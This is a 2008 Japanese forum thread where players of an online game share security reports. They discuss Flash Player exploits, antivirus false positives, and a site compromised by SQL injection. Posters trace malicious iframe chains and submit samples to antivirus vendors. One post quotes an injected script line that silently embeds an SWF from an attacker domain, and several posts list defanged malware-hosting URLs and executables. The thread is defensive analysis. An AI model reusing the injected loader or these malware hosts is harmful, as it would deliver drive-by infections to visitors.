741 ：（○口○*）さん sage ： 2008/05/29(木) 00:05 ID:30Sp5mWZ0

>>740
おかげで検体を出すのもちょっと躊躇するんすよ。
あるswfを送っても、それは(swfの仕様の範囲内で)
別のswfを呼ぶためだけの物だったりするんで。
swftoolsでダンプして見てるけどよくわからん。

742 ：（○口○*）さん sage ： 2008/05/29(木) 00:16 ID:iukAM2i60

現状のところ、swf見ないようにするほかの対処法はないってことだな……
Adobeのバージョンアップがくるまでは、自衛策としてフラッシュみないこと、と。

743 ：（○口○*）さん sage ： 2008/05/29(木) 01:38 ID:30Sp5mWZ0

おおっと、swfに関してはOneCareが意外と早かった。
TrojanDownloader:Win32/Swif.A
TrojanDownloader:Win32/Swif.E
TrojanDownloader:Win32/Swif.G
TrojanDownloader:Win32/Swif.H
もっとも場当たり的な対応でちょっと変わると検知しないかもしれない。
Adobeからな〜んも情報が出ていない時点では
この辺どう検知させるかはアンチウイルスベンダの悩みどころだろうなぁ。

744 ：（○口○*）さん ： 2008/05/29(木) 01:42 ID:30Sp5mWZ0

ちなみにAdobeのセキュリティチーム(笑)のブログ。
blogs.adobe.com/psirt/
Symantecからいろいろ教えてもらっている最中のようで、
たぶん自分たちのプログラムのどこがまずいか把握できてない。

745 ：（○口○*）さん sage ： 2008/05/29(木) 02:33 ID:WyVWDSO20

件のファイルを拾えたのでVTに投げてみたら、こんな感じ

ttp://www.virustotal.com/analisis/2e481c0d11e6780ba6e1627354d3679b
>Result: 1/32 (3.12%)
>Symantec 10 2008.05.28 Downloader.Swif.C

ファイルサイズが140byteの代物だったので、>724の懸念が
当たってるかどうかは不明。

746 ：（○口○*）さん sage ： 2008/05/29(木) 03:09 ID:30Sp5mWZ0

VTでは出てこないけどMcAfee AVERTに投げたら
27日朝に「heuristic detection beav-shellcode」と返信来てた(全部じゃないけど)。
パターンでの対応はまだだけど初動は最も早かった気がする。

747 ：（○口○*）さん sage ： 2008/05/29(木) 07:15 ID:30Sp5mWZ0

Flashの件。0dayでは無く、9.0.124で対策済みの模様。
ttp://blogs.adobe.com/psirt/2008/05/potential_flash_player_issue_u_1.html
ttp://www.avertlabs.com/research/blog/index.php/2008/05/28/flash-player-exploit-update-2/

748 ：（○口○*）さん sage ： 2008/05/29(木) 09:05 ID:FgFD8x0E0

どうも事実関係がはっきりせずあやふやだなあ。

749 ：（○口○*）さん sage ： 2008/05/29(木) 09:41 ID:GokvavjX0

WikipediaにもWU→Windows_Update→Microsoft_Updateの誘導があるし、妥当なabbrevだろうよ。
これでわかりにくいというなら、見識が足りないだけじゃないの。

750 ：（○口○*）さん sage ： 2008/05/29(木) 09:51 ID:30Sp5mWZ0

その話は終わった。

751 ：（○口○*）さん sage ： 2008/05/29(木) 10:09 ID:30Sp5mWZ0

>>748
未パッチと指摘しAdobeとやり取りしていた
SymantecSecurityFocusもRetiredになった。
ttp://www.securityfocus.com/bid/29386

752 ：（○口○*）さん sage ： 2008/05/29(木) 11:14 ID:7Yu9gd/G0

えーっと、あんましPCに詳しくないから聞きたいんだけど、
ニコ動にしろYoutubeにしろ、動画ファイル自体はflvファイルだよね？
確かにうｐするときはswfだけど。

このとき、flvでもswfに仕込んだ罠は動かせるってわけ？
swfでできるのは知ってるけど、flvでもできるの？

753 ：（○口○*）さん sage ： 2008/05/29(木) 12:36 ID:30Sp5mWZ0

JPCERT/CCもJVNも修正されてるね。

いちおう。
FlashPlayerの更新
ttp://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash

754 ：（○口○*）さん sage ： 2008/05/29(木) 18:28 ID:TUEyloiu0

人騒がせなニュースだったな。
まあ、用心するに超したことはないんだけれどね。

他の脆弱性と組み合わせて使われるだろうから、
別のゼロデイ攻撃があったときに、こいつをトリガにして
うっかりやられる可能性もあるし。

755 ：（○口○*）さん sage ： 2008/05/29(木) 18:42 ID:epZFOGjo0

>>753
この更新入れておけばFlashの脆弱性つかれるのは大丈夫なのかな？
ずっと読んでたけどいまいち分からなかったんだ

756 ：（○口○*）さん sage ： 2008/05/29(木) 19:41 ID:30Sp5mWZ0

>>755
うん。

757 ：（○口○*）さん sage ： 2008/05/29(木) 21:35 ID:lQv/QGNu0

>>752
落としてみれば分かるが、ニコでswfでうｐされたファイルは、そのままswfで落ちてくる
だから利用される可能性はあるんじゃないかな

758 ：（○口○*）さん sage ： 2008/05/29(木) 21:58 ID:epZFOGjo0

>>756
ありがとう。
知り合いにも更新勧めておきます

759 ：（○口○*）さん sage ： 2008/05/30(金) 09:15 ID:UvM7cIt40

アプリコの殴りアコプリスレに張られていたもの

www■blogplayonlin■com/blog/konline■zip
--->mov000029■wmv■scr

アドレス自体は既知のものだが、直接blogplayonlinや/blogを
見に行くと403が返ってくる罠。


>758
WUと同じように、常に最新のものにしておかないと危険だよ。
最近の各種ソフトのバージョンアップってバグ取りや新機能追加よりも
セキュリティホールの対応が多いし。

760 ：（○口○*）さん sage ： 2008/05/30(金) 10:32 ID:G+CMzrDC0

管理板より転記

78 名前：側& ◆2wI/ZkiJho[shiou★yahoo,co,jp] 投稿日：08/05/29(木) 22:58 ID:7LuspO0U0
神速AX (Z47H)
少し前に撮った神速AXの動画ですが、名前を切り取ってアップさせていただきますね。...RO
http://www■blogplayonlin■com■blog■konline■zip

79 名前：& ◆IvlEUwQ0mg[shiou★yahoo,co,jp] 投稿日：08/05/29(木) 22:59 ID:7LuspO0U0
神速AX (Z47H)
少し前に撮った神速AXの動画ですが、名前を切り取ってアップさせていただきますね。...RO
http://www■blogplayonlin■com■blog■konline■zip

761 ：（○口○*）さん sage ： 2008/05/30(金) 13:43 ID:OGMzOxkl0

すいません、ニコ動のTop画面を開いたらアバストが反応して、
ログビューアを見たらSWF:CVE-2007-0071 [Expl]と表示されました。
これはウィルスの一種なのでしょうか？
↑の方にニコ動関係でいくつか書いてあったのですが、そちらと関連があるのでしょうか。
ブラウザはIE6SP2を使用しています。

762 ：（○口○*）さん sage ： 2008/05/30(金) 14:20 ID:8wsoGNof0

>>761
SWF:CVE-2007-0071 [Expl] ってことは、Flash Player 9.0.115.0以前、
および8.0.39.0以前にある脆弱性を突く変造swfだろうな

Flash Playerのセキュリティ脆弱性に対処するためのアップデート公開
http://www.adobe.com/jp/support/security/bulletins/apsb08-11.html

バージョンアップいってら
http://live27.2ch.net/test/read.cgi/ogame/1211922679/108

763 ：（○口○*）さん sage ： 2008/05/30(金) 14:21 ID:DVR6Rh8V0

>>761
この辺かな。とりあえずavast!限定の話らしいからスレの流れとは別物。

ニコニコ動画本スレッド Part592
http://pc11.2ch.net/test/read.cgi/streaming/1212106974/
【ニコ動ｵﾜﾀ？】avastがニコニコ動画からマルウェア検出するようになった件
http://namidame.2ch.net/test/read.cgi/news/1212108815/

764 ：（○口○*）さん sage ： 2008/05/30(金) 14:21 ID:SeyaXRFL0

つまり >>724 。

765 ：（○口○*）さん sage ： 2008/05/30(金) 14:43 ID:OGMzOxkl0

レスありがとうございます、Flashのほうは9,0,124,0に更新してきました。
更新後、ニコ動に一度アクセスしてみましたがやはり前回と同じ表示が出ました。

↑で紹介されたスレを見てきましたが、同じような症状に遭われてる方が多いですね。
そちらのスレをこちらと合わせて確認し、様子を見ようと思います。
アドバイスありがとうございました。

766 ：（○口○*）さん sage ： 2008/05/30(金) 14:47 ID:8wsoGNof0

>>763　情報ありがと。
というわけで、>>762を一部訂正。

avast!は正常なswfを危険なswfと誤検知する可能性が高い。
Flash Playerを9.0.124.0以降に更新して、avast!の誤検知が修正されるのを待ちましょう。

てとこかな。

767 ：（○口○*）さん sage ： 2008/05/31(土) 10:12 ID:KZVZeLGn0

今朝ROを終了した際、avastが疑わしいファイル（ヒューリスティック法？）として
ROフォルダ内GameGuard\dump_wmimmc.sysというファイルが検出されました。
avastの推奨するアクションが無視だったため、無視。
するとavastがメモリ上にウィルスを検出しました。
GameGuardフォルダ内を見てみたところ
dump_wmimmc.sysというファイルは見つかりませんでした（隠しファイル表示をして）
その後、カスペルスキーオンラインスキャナを行いましたがウィルス等は検出されませんでした。
ウィルスが検出されず、GameGuard内に存在していることからnProtect関係だと思われるのですが、
この症状は問題ないとみなしても大丈夫でしょうか？

768 ：（○口○*）さん sage ： 2008/05/31(土) 10:38 ID:v2grKBTp0

>817 （○口○*）さん sage New! 08/05/31 04:29 ID:wLDtRYv40
>すいません、ちょっとききたいのですが
>下のようなアドレスを２連投で張られたのですが
>アカハックアドレスでしょうか？？
>
>もしアカハクだとまずいので、アドレスは少し消してます
>
>
>RO　ハイプリがヒールでゾンビを癒す
>ttp://www■sakerver■com/web/douga/

>819 （○口○*）さん sage 08/05/31 04:36 ID:8UBl8MQY0
>>>817
>ソースチェッカーだと、「※このアドレスは危険URLのひとつです。」と赤字で出る。
>が詳細が出ない。

>821 （○口○*）さん sage 08/05/31 04:53 ID:Gfn+Eg0X0
>とりあえず垢ハックの殆どがドメイン持ってる中国内陸部のURLであることは分かった
>
>>>817のURLは404(?)になってるが同ドメインの他のディレクトリにexeへのリンクがある
>のを確認した

>822 （○口○*）さん sage 08/05/31 05:15 ID:/1d2Ba2tO
>そのヒールでゾンビを癒す、ってやつニコ動で見たんですが・・・それは大丈夫なのかな

>823 （○口○*）さん sage 08/05/31 05:21 ID:Gfn+Eg0X0
>他所の「RO関連だと思われる文章」を一緒に貼り付けるのは良くあること


物質（ものしつ）スレに投稿されていた内容。

769 ：（○口○*）さん sage ： 2008/05/31(土) 10:38 ID:v2grKBTp0

>>767
それはnProが一時的に生成して終了時に削除するファイル。
許可をださないとROは起動しなくなる。

770 ：（○口○*）さん sage ： 2008/05/31(土) 10:40 ID:v2grKBTp0

あ。メモリ上に〜というのは知らない。多分、危険な手法を使ってるnProだから検知したんだと思うけど
自己責任で判断してくれ。

あと、質問する時は、せめて、ログから検出した名称位は貼り付けてくれよ。

771 ：（○口○*）さん sage ： 2008/05/31(土) 12:19 ID:mwdjpAXK0

avastはちょっと誤検知が多いな。

772 ：（○口○*）さん sage ： 2008/05/31(土) 12:39 ID:pXlbvISs0

>768
そこ>663から続くレスにもあるが、間違いなくアカハックアドレス。
その時は>675にあるように新種が置かれていた。

見事に物質スレに誤爆してしまったorz

773 ：（○口○*）さん sage ： 2008/05/31(土) 13:04 ID:KZVZeLGn0

>>769
解説ありがとうございます。
nproの誤検知のようですね。
ログに関しては以後気をつけます。
ありがとうございました。

774 ：（○口○*）さん sage ： 2008/05/31(土) 19:07 ID:0LFYh5Fh0

警察に連絡して5ヶ月くらいたって
癌からメールｷﾀ━━━━(ﾟ∀ﾟ)━━━━!!!!

モスコビアカムバック

嫌がらせか(´；ω；`)

775 ：（○口○*）さん sage ： 2008/05/31(土) 19:19 ID:fqQFgC790

警察に何をどう伝えてどれだけやりとりしたのかも書かずそんなこと言われてもチラ裏だろう

776 ：（○口○*）さん sage ： 2008/05/31(土) 20:02 ID:v2grKBTp0

>>774
警察に進展具合を問い合わせ
癌に警察に報告済みであることと、調査進展状況を問い合わせ

両方平行してやっとけ

777 ：（○口○*）さん sage ： 2008/05/31(土) 23:15 ID:0LFYh5Fh0

>>775
捜査して進展があったら連絡しますっていわれてた状況でした

>>776
さすがに5ヶ月放置はなんかあったかもしれないんで今度電話してみますありがとう

778 ：（○口○*）さん sage ： 2008/06/01(日) 02:42 ID:RPe9/W0s0

質問があります
先ほどノートン先生にてスキャンしてたところ今まで検出しなかった
\ragdefender\rdefender.dfdを検出しまた
リスク名はDownloaderでノートンの定義バージョンは2008・05・31・002になってて
リスクの状態が完全に削除しましたになってます（自動で削除）
で、本題ですがこのファイルは削除しても良いのでしょうか？
わかりにくい質問で申し訳ないですがよろしくお願いします

779 ：（○口○*）さん sage ： 2008/06/01(日) 03:13 ID:XNoQwqSj0

>>778
nProの一時ファイルっぽい気がするけどよくわからん。
複数のエンジンでオンラインスキャンかけてみれ。

780 ：まとめ臨時 ◆kJfhJwdLoM sage ： 2008/06/01(日) 03:28 ID:gR5R6rVp0

>>778
検索をかけてみるとrdefender.dfdは以前の不正対策用ファイルで
現在配布されているクライアントをインストールした場合、
該当フォルダとそのファイルは存在しません。
(今は\RagnarokOnlineのフォルダに
　直接置かれているdfdファイルとGameGuardフォルダがあります)

778さんの使用されているクライアントは
nProが実装されたり変更になったりした時期のものか
それ以前のクライアントのまま使用されていて
不正対策パッチが実装されたりされなかったりで
そのまま使われなくなったものかと思われます。

削除されずデータがそのまま残っていて、
今回の検出に引っかかったのかもしれませんね。

参考　http://ragd.sakura.ne.jp/q_and_a/cbbs.cgi?mode=al2&namber=49286&rev=&no=0&KLOG=158

781 ：（○口○*）さん sage ： 2008/06/01(日) 08:41 ID:PhQM5s9f0

散々語りつくされていたりスレ違いだったら恐縮なんですが、質問があります
ネットサーフィンを可能な限り安全にしたいと思い、SandBoxの導入を考えています
ソフトはSandBoxieというものを使おうと思っているのですが、垢ハック系はこれでほぼ防げると考えて良いでしょうか

それと、こちらは垢ハックには直接関係無いかもしれませんが
>Sandboxieの性質上メモリ、ブートセクタ感染などのタイプは対処できない
と紹介されていたサイトのひとつに書いていました

このメモリ、ブートセクタ感染タイプのウイルスというのは具体的にどの様なものなのでしょうか
挙動や性質については調べて分かったのですが、感染経路がいまいち分かりません
例えば垢ハックサイト等で見られる「サイトを開いた瞬間に感染」といった事でも感染する類のタイプでしょうか
それとも、ウイルスが仕込まれたexe等実行ファイルを実行しない限りは感染しないタイプでしょうか？

きちんと把握が出来ていないので、まとまりの無い文章になっているかもしれませんが宜しくお願いします

782 ：７７８ sage ： 2008/06/01(日) 09:17 ID:RPe9/W0s0

>>779-780さんありがとうございます
確かにクライアントは昔インストしたタイプです
しかしノートン先生も昔から入れてたのに今回初検出だったので改めて
ｹﾞｰﾑに向いてないんだな〜と思いつつ更新申し込んだばかり・・・
どうせなのでカスペ等でオンラインスキャンやクライアントの入れなおししようと思います

783 ：（○口○*）さん sage ： 2008/06/01(日) 13:34 ID:t/Q2xJTn0

>781
SandBoxieの存在を知らなかったのでちょっとググって見たが
なんか同じ記事のコピーしかヒットしなかったので、信頼性等に
ついては良く分からない。
スレ住人に利用者が居たら、話聞けるかも。

ただ似たような事やるなら、VMWarePlayer＋Ubuntuとかの方が
実績と信頼の面で上な気がする。

>例えば垢ハックサイト等で見られる「サイトを開いた瞬間に感染」といった事でも感染する類のタイプでしょうか
>それとも、ウイルスが仕込まれたexe等実行ファイルを実行しない限りは感染しないタイプでしょうか？

「サイトを見た瞬間感染」というのは、ブラウザが開いたときに
自動的にDLし、実行させるように仕組んであるだけ。

つまりその２タイプは同じ事。
ただ発動のさせ方が、強制的かユーザー操作か、の違いなだけ。

784 ：（○口○*）さん sage ： 2008/06/01(日) 14:03 ID:ZDLkMZpn0

ブートセクタやメモリに感染する云々は、ウィルス自体の感染様式の話。
感染経路とは関係ない。

785 ：（○口○*）さん sage ： 2008/06/01(日) 15:43 ID:4deL/6oqO

エロゲメーカのゆずソフトOHPが改竄されて
iframe利用して罠サイトに飛ぶ様になってるらしい
BBSPINKは18禁だからアドレス張らんが「ゆずソフト 柚14個目」参照よろ

ν速にもスレ立てられててﾜﾛﾀ

786 ：（○口○*）さん sage ： 2008/06/01(日) 15:58 ID:t/Q2xJTn0

>785
ソースチェッカー経由で見てきた

トップに当たる frame■html の先頭にいきなり
>pp■cool0■biz/bmw/am1■htm?34-8681
というサイズ０のフレーム有り

それを潜ると更にiframeで何個かのページに。
ちらっと見たけど、JavaScriptページ以外にこんなものが
>document.write("<EMBED src=http:/www■tongji123■org/4562■swf width=0 height=0>");

サイズ０のswfって事は、アレだろうな……

787 ：（○口○*）さん sage ： 2008/06/01(日) 16:33 ID:PhQM5s9f0

手段が違うだけで、どちらの手段を取っても目的(結果)は変わらないというわけですね
勉強になりました

>>783
VMware等の仮想PCやデュアルブート、1CD Linux等も調べ、考慮したのですが
私のPCだとスペック不足であったり、あるいは常日頃から使うには不便な面があり断念しました
その結果、比較的導入しやすく、動作も軽そうなSandBoxに行き着いたのです
しかし、仰る様にやはり信頼性等は軽視出来ない為に悩んでいます

一応ですが、私が参照したサイトを参考までに挙げておきます

簡単な紹介などが掲載されているサイト
念の為■を入れていますので、心配な方はソースチェッカー等掛けて下さい

memo/手軽に実験環境を作れるSandboxie - ranma.biz
http://■ranma.biz/index.php/memo/%E6%89%8B%E8%BB%BD%E3%81%AB%E5%AE%9F%E9%A8%93%E7%92%B0%E5%A2%83%E3%82%92%E4%BD%9C%E3%82%8C%E3%82%8BSandboxie

Windows上にテスト環境を作ってくれる『SandBoxie』 | 100SHIKI.COM
http://www.■100shiki.com/archives/2007/05/windowssandboxie.html

仮想ファイルシステム上で安全にIEを実行するSandboxie - 情報考学 Passion For The Future
http://www.■ringolab.com/note/daiya/2004/10/iesandboxie.html

また、2chのセキュリティ板にSandBoxieのスレがあるのを見つけました
ttp://pc11.2ch.net/test/read.cgi/sec/1178731848/
まだ全てに目を通していませんが、これから見てみます

788 ：（○口○*）さん sage ： 2008/06/01(日) 16:42 ID:t/Q2xJTn0

VTに投げてきた

yuzu-soft■com/frame■html
--->pp■cool0■biz/bmw/am1■htm?34-8681
----->pp■cool0■biz/axlz■htm　VT 1/31
----->pp■cool0■biz/ax14■htm　VT 0/31
----->pp■cool0■biz/re10■htm　VT 0/31
----->pp■cool0■biz/re11■htm　VT 1/31
----->www■tongji123■org/axfs■htm　VT 2/31
------->www■tongji123■org/4561■swf　VT 0/31
------->www■tongji123■org/4562■swf　VT 0/31

axlz■htm　ttp://www.virustotal.com/analisis/37a3f7d974497600ed28019b976835a2
ax14■htm　ttp://www.virustotal.com/analisis/11a02a186728bb44bb562c2ca878db7e
re10■htm　ttp://www.virustotal.com/analisis/096145bb9c7671f7c979d13869300a07
re11■htm　ttp://www.virustotal.com/analisis/b196586622f9c58ae4adad9493b13939
axfs■htm　ttp://www.virustotal.com/analisis/b9970be8729f2e93081369449109b375
4561■swf　ttp://www.virustotal.com/analisis/2f053cc4054b2feec22400701a69eeb6
4562■swf　ttp://www.virustotal.com/analisis/726cb7a3e0abbdf28af09d77afbd2d69

swfもソースの記述的に怪しいけど全部スルーだし、纏めてカスペに提出してきます

789 ：（○口○*）さん sage ： 2008/06/01(日) 17:27 ID:t/Q2xJTn0

なんか回答が無茶苦茶早かった

4561.swf - Trojan-Downloader.SWF.Small.ax,
4562.swf - Trojan-Downloader.SWF.Small.ay,
ax14.htm_ - Trojan-Downloader.VBS.Psyme.pp,
axlz.htm_ - Exploit.JS.Agent.os,
re10.htm_ - Exploit.JS.RealPlr.js,
re11.htm_ - Exploit.JS.Agent.ot

次の更新で対応との事

790 ：（○口○*）さん sage ： 2008/06/01(日) 17:27 ID:J/n5Mj+U0

>>785
丁度引っかかったぜorz
なんか白くて読み込んでる途中で気づいてブラウザ落としたが
再インスコだろうなぁ・・・orz

791 ：（○口○*）さん sage ： 2008/06/01(日) 17:34 ID:aJGAJYQs0

VMWareのWorkStationとかいうやつは大分前にnProにプロセス殺されるようになった。
VMWare起動中にROを起動するとVMWareが固まって、RO起動中にVMWareを
起動しようとするとVMWareが起動しなくなる。

792 ：（○口○*）さん sage ： 2008/06/01(日) 17:59 ID:hnMOw2SY0

調査乙

SQLインジェクションに加えて、仕掛けた罠はFlashやRMの
脆弱性など、数撃ちゃ当たる、みたいな格好だな……
エロゲメーカーのOHP狙うあたり、中華も考えてるというか
なんというか。

しかし予想通りというか、OS以外の脆弱性を突くタイプが
増えてきたなぁ。
OSの穴はWUで塞がれるが、Flashの穴とか、この間の騒ぎ
みたいに大きなニュースにならない限り、気にしない人も
多いだろうし。

OS外の脆弱性は正直手に追えないぞ……
PCインストールアプリを細かい部分まで把握してる人なんか
少ないだろうし。

793 ：（○口○*）さん sage ： 2008/06/01(日) 18:30 ID:xivT8NA80

しかし日曜日なのに30分で返してくるんだからすごいな……
どこぞのﾈﾄｹﾞ運営会社にも見習って欲しいもんだぜ……

794 ：（○口○*）さん sage ： 2008/06/01(日) 19:18 ID:JZN7oYRR0

>>792
>エロゲメーカーのOHP狙うあたり、中華も考えてるというかなんというか
考えてないよ。もはやツールで自動でガーっとやってる。
ttp://www.isskk.co.jp/support/techinfo/general/sql_inject_293.html
自分がどこを改ざんしたかすら把握してないんじゃないかな。

795 ：（○口○*）さん sage ： 2008/06/01(日) 19:24 ID:x+2c6vex0

公式のトップにインジェクションでサイズ０のフレーム仕掛けたなら
真っ白な画面にはならんと思うんだが？

796 ：（○口○*）さん sage ： 2008/06/01(日) 19:27 ID:x+2c6vex0

それと新スレもそろそろ考える必要があるが、テンプレにRMと
FlashのVerも書くようにした方がいいのかねぇ？
ただ増やすと今後キリが無くなる気もするが。

797 ：（○口○*）さん sage ： 2008/06/01(日) 19:40 ID:JZN7oYRR0

いらないと思う。本当にきりがない。

798 ：（○口○*）さん sage ： 2008/06/01(日) 20:30 ID:pK6iVILZ0

今のテンプレにも「定期的に各種ソフトのアップデートも行え」ってあるしね。

799 ：788 sage ： 2008/06/01(日) 22:29 ID:t/Q2xJTn0

先ほどチェックした所、PCのカスペで検出・削除した事を確認。
VTでも検出された。

800 ：（○口○*）さん sage ： 2008/06/02(月) 14:26 ID:GGjLQpg30

「Safari」Windows版の複合的脅威について、Microsoftが警告
http://internet.watch.impress.co.jp/cda/news/2008/06/02/19775.html

ファイルを勝手にローカルへ保存できてしまう様子

801 ：（○口○*）さん sage ： 2008/06/02(月) 15:23 ID:fAObb9qF0

Adobeが一方的に悪いわけではなく
Windows側にも非があるかも知れないって内容なんかな

802 ：（○口○*）さん sage ： 2008/06/02(月) 20:57 ID:A0VCVxPc0

何を言ってるんだ…?

803 ：（○口○*）さん sage ： 2008/06/03(火) 00:05 ID:LExNuCCW0

ゆずソフトクラッキングと類似したページ発見
benri■5amf■cn

インラインフレームで
ph■errtys■org/gol/am1■htm?272
を呼び出して
その先には
ph■errtys■org/ax14■htm
ph■errtys■org/re10■htm
ph■errtys■org/axlz■htm
ph■errtys■org/re11■htm


すまんが誰かVTやカスペのチェックやっていただけないか時間がない
申し訳ない

804 ：（○口○*）さん sage ： 2008/06/03(火) 00:29 ID:8BPea54U0

>>800
先月の時点で話は出ていた
ttp://www.itmedia.co.jp/enterprise/articles/0805/21/news032.html
「当社はこれをセキュリティ問題としては扱わない」(Apple)
だそうだが・・・

805 ：（○口○*）さん sage ： 2008/06/03(火) 00:36 ID:qW8uOwnb0

>>803
virustotalに投げてみた

ph■errtys■org/gol/am1■htm
ttp://www.virustotal.com/jp/analisis/89e0c28b7da57f08522178cbeaace002

ph■errtys■org/ax14■htm
ttp://www.virustotal.com/jp/analisis/e9b73505a49f9f1d6ab2586adcc273f9

ph■errtys■org/re10■htm
ttp://www.virustotal.com/jp/analisis/8e1db5dc4334e3dd42d8d7c13f0ec8a9

ph■errtys■org/axlz■htm
ttp://www.virustotal.com/jp/analisis/cff7a236941f46db52dfab1d07ef70b5

ph■errtys■org/re11■htm
ttp://www.virustotal.com/jp/analisis/35694befcac8397b881f39f750fd5800

806 ：（○口○*）さん sage ： 2008/06/03(火) 00:37 ID:ooW17KXh0

>803
DNS引いてみた所、ゆずソフトのpp■cool0■bizと
同じIP（61■164■145■62)だった。

が、既にファイルが差し替えられてる風味。
>789でカスペが検出してたのが、今してない。

ax14　7/32　ttp://www.virustotal.com/analisis/e9b73505a49f9f1d6ab2586adcc273f9
re10　0/32　ttp://www.virustotal.com/analisis/8e1db5dc4334e3dd42d8d7c13f0ec8a9
axlz　0/32　ttp://www.virustotal.com/analisis/cff7a236941f46db52dfab1d07ef70b5
re11　1/32　ttp://www.virustotal.com/analisis/1698c31d132f5c401f621b71623001b6

検体提出してくる

807 ：（○口○*）さん sage ： 2008/06/03(火) 00:49 ID:qW8uOwnb0

>>806
乙です

>>788
pp■cool0■biz/bmw/am1■htm　（5/32）
ttp://www.virustotal.com/jp/analisis/02b71618dc71e6a28416e982d8fdb02c

ph■errtys■org/gol/am1■htm　（4/32）
http://www.virustotal.com/jp/analisis/89e0c28b7da57f08522178cbeaace002

なんか気になったので見たら別物だった…

808 ：（○口○*）さん sage ： 2008/06/03(火) 00:50 ID:pVRZ9TWo0

まースクリプトはいいんじゃない?
本体はこれ。2008-05-30。
dm■htifns■com■cn/vv.exe
ttp://www.virustotal.com/analisis/26c5dc475eda7c75a5d1676b90c5beb6
NortonとNOD32以外は捕獲できる模様。

809 ：（○口○*）さん sage ： 2008/06/03(火) 00:52 ID:pVRZ9TWo0

んでこれ3つ同じね。
ph■errtys■org
pp■cool0■biz
d■sorryl■biz

810 ：（○口○*）さん sage ： 2008/06/03(火) 01:20 ID:pVRZ9TWo0

w■117b■cn/net/are.exe
こちらはavastとKasperskyに提出。
ttp://www.virustotal.com/analisis/fb9a810c7a10558e1d9b221964ff078f

811 ：まとめ臨時 ◆kJfhJwdLoM sage ： 2008/06/03(火) 01:38 ID:4EJ/23co0

更新前に滑り込み810さん分も追加。

117b■cnで検索をかけるとめっちゃでてきますね。
ファイル置き場なのか連番で置かれている模様。
どっかにもしかしたらリスト置き場もあるのかもしれませんね。

812 ：（○口○*）さん sage ： 2008/06/03(火) 02:17 ID:pVRZ9TWo0

>>811
今は www■mvoe■cn と同じ。たぶんこっちのほうが有名。
以前はマルチドロッパ(ダウンローダ)が参照するtxtに書いてあった。
参照 http://gemma.mmobbs.com/test/read.cgi/ragnarok/1195956271/750

813 ：（○口○*）さん sage ： 2008/06/03(火) 02:18 ID:ooW17KXh0

カスペから返答
>Hello.
>New malicious software was found in the attached files.
>Its detection will be included in the next update. Thank you for your help.

普段だと検出名書いてくるのに、今回はこれだけだった。


>808
ax14ってDropper型？
何かのバイナリを作成して実行してるようだけど。

最終的に>808のEXEを取りに行くだけなんだろうけど
見慣れないのはどうにも気になる。

814 ：（○口○*）さん sage ： 2008/06/03(火) 02:35 ID:pVRZ9TWo0

>>813
いや、バイナリじゃなくてただの難読化。
最近「eval(function(p,a,c,k,e,d)〜」や「base64encode」と並び、よく見かける形式。
ax14というファイル名のとおり、平文に戻すとclsid:BD96C556(略)とか
Microsoft.XMLHTTPとかのいつものMS06-014。

参考 McAfeeブログ
ttp://www.avertlabs.com/research/blog/index.php/2008/05/14/the-commercial-html-packer-dilemma/

ちょっと確認するだけならdocument.writeやexecuteをalertにして踏む(笑)。

815 ：（○口○*）さん sage ： 2008/06/03(火) 02:56 ID:pVRZ9TWo0

これ3つ同じ。
w■117b■cn
www■mvoe■cn
www■mmboi■cn

816 ：（○口○*）さん sage ： 2008/06/03(火) 09:20 ID:pVRZ9TWo0

大暴れしたwww■adw95■com(ググるとすごい)の新ドメイン3つ。
www■logid83■com
www■sysid72■com
www■en-us18■com
b.jsからiframeでen-us18設置のFlashを使用。

817 ：（○口○*）さん sage ： 2008/06/03(火) 12:32 ID:NjVoKyk10

2008年になってからしばらく少なかったのに
ココ最近すごい勢いで増殖してるな……
ｹﾞｰﾑ内BOTも増えたし、中華またROに目つけたんだろうな

818 ：（○口○*）さん sage ： 2008/06/03(火) 14:10 ID:4KfxT3Fm0

支那狗はほんと手段を選ばんな

819 ：（○口○*）さん sage ： 2008/06/03(火) 17:26 ID:pVRZ9TWo0

>>817
BBSやBlogやWikiへの投下という旧来の手法が減っただけで、
SQLインジェクションによる正規サイトへの注入という形で
トータルでは増えてるかと。
去年の11月くらいから目立ち始め、5月からが特にひどい。

820 ：（○口○*）さん sage ： 2008/06/03(火) 19:47 ID:q71iIbcu0

SAKURAの経路（ゲートウェイ？）クラックはまたエライこっちゃな。

SAKURAの発表の能天気具合も。。。

821 ：（○口○*）さん sage ： 2008/06/03(火) 21:06 ID:mYp5uAdo0

ARP Spoofing
xreaでもあった手口ですな

822 ：（○口○*）さん sage ： 2008/06/03(火) 21:40 ID:pVRZ9TWo0

>>821
>xreaでもあった手口ですな
最近? ヴァナモンもこれかな?

823 ：（○口○*）さん sage ： 2008/06/03(火) 21:55 ID:aJ8LpO+e0

この件は、単なるサーバ改竄よりも深刻だな。
例え、自分の管理下サイトが強固なセキュリティ対策を施していたとしても、同一ホスティング事業者に穴があればそこにつけ込まれてしまう。
SAKURAの場合、専用/共用サーバの再販なども普通に行われているから、管理上不十分な要素が生まれやすいのもあるし。

Yahooニュースにも掲載
ttp://headlines.yahoo.co.jp/hl?a=20080603-00000001-vgb-secu

関連投稿
ttp://ruriko.denpa.org/200806a.html#0201
ttp://memo.st.ryukoku.ac.jp/archive/200806.month/9458.html

ARPスプーフィング：読者のWebホスティング・サービスは守られているか：ITpro
ttp://itpro.nikkeibp.co.jp/article/COLUMN/20071019/284979/

ここ(MMOBBS)もSAKURAの共用サーバでサービスされている以上、対岸の火事とは言えない状況。
安全性確保の観点では、各種ソフトウェアの更新はもちろんだが、それ以上に有用な対策として、専用ブラウザの導入を強く推奨。

824 ：（○口○*）さん sage ： 2008/06/03(火) 22:07 ID:7TgYYYLd0

>>816
sysid72■com/b■jsのiframeはランダムっぽい
redir94■comも

825 ：（○口○*）さん sage ： 2008/06/03(火) 22:50 ID:ooW17KXh0

>Windows XP SP3導入でFlash Playerが脆弱に？
>ttp://www.itmedia.co.jp/news/articles/0806/03/news023.html

>脆弱性のあるバージョンのFlash Playerが、Windows XP SP2とSP3、
>XP Professional x64 Editionで再配布されたことを明らかにした。
>
>Windows XP SP2とXP Professional x64 Editionの場合、これまでに
>配布されたセキュリティアップデートを適用していれば改めて更新する
>必要はないという。しかしXP SP3の場合、Flash Playerの脆弱性に対処する
>セキュリティアップデートを直ちに適用するよう、ユーザーに促している。


以前に9.0.124.0を当ててても、SP3当てた時点でバージョンダウンしてる模様。
SP3を当てた人は再度自分のFlashPlayerのバージョンを確認した方がいいかも。

826 ：（○口○*）さん sage ： 2008/06/04(水) 00:04 ID:aQs8KTty0

>>824
さっき見つけたｗ

